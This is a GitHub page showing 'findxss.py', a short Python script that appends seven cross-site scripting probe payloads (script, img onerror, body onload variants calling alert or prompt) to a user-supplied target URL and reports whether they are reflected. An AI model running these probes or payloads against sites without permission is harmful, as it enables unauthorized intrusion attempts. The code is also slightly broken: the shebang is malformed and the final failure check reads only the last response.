-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathfindxss.py
60 lines (53 loc) · 2.43 KB
/
findxss.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#!usr/bin/env python3
import os, requests, time
from colorama import Fore
os.system("clear")
print(Fore.CYAN + """
_ __ _______ __
| |/ /__________ / ____(_)___ ____/ /
| // ___/ ___/ / /_ / / __ \/ __ /
/ |(__ |__ ) / __/ / / / / / /_/ /
/_/|_/____/____/ /_/ /_/_/ /_/\__,_/
""")
print(Fore.RED + "Web URL XSS test script\n")
print(Fore.BLUE + "PRODUCER = Saep\n")
print(Fore.BLUE + "Updater = ASER\n")
print(Fore.GREEN + "Version 0.4\n")
payload1 = "<script>alert(:D)</script>"
payload2 = """<ScRipT>alert("XSS");</ScRipT>"""
payload3 = """<img src=xss onerror=alert(1)>"""
payload4 = """<script ~~~>alert(0%0)</script ~~~>"""
payload5 = """<body/onload=<!-->
alert(1)>>"""
payload6 = """<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?"""
payload7 = """</script><script>alert(1)</script>"""
url = input("Target Url: ")
req = requests.post(url + payload1)
if payload1 in req.text:
print(Fore.GREEN + "\nXSS Vulnerability Founded!")
print(Fore.GREEN + "\nPayload: <script>alert(:D)</script>\n\n")
req = requests.post(url + payload2)
if payload2 in req.text:
print(Fore.GREEN + "\nXSS Vulnerability Founded!")
print(Fore.GREEN + """\nPayload: <ScRipT>alert("XSS");</ScRipT>\n\n""")
req = requests.post(url + payload3)
if payload3 in req.text:
print(Fore.GREEN + "\nXSS Vulnerability Founded!")
print(Fore.GREEN + """\nPayload: <img src=xss onerror=alert(1)>\n\n""")
req = requests.post(url + payload4)
if payload4 in req.text:
print(Fore.GREEN + "\nXSS Vulnerability Founded!")
print(Fore.GREEN + """\nPayload: <script ~~~>alert(0%0)</script ~~~>\n\n""")
req = requests.post(url + payload5)
if payload5 in req.text:
print(Fore.GREEN + "\nXSS Vulnerability Founded!")
print(Fore.GREEN + """\nPayload: <body/onload=<!-->
alert(1)>>\n\n""")
req = requests.post(url + payload6)
if payload6 in req.text:
print(Fore.GREEN + "\nXSS Vulnerability Founded!")
print(Fore.GREEN + """\nPayload: <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\n\n""")
req = requests.post(url + payload7)
if payload7 in req.text:
print(Fore.GREEN + "\nXSS Vulnerability Founded!")
print(Fore.GREEN + """\nPayload: </script><script>alert(1)</script>\n\n""")
if not payload1 in req.text and not payload2 in req.text and not payload3 in req.text and not payload4 in req.text and not payload5 in req.text and not payload6 in req.text and not payload7 in req.text:
print(Fore.RED +"\n\nPayloads Unsuccessful!\n")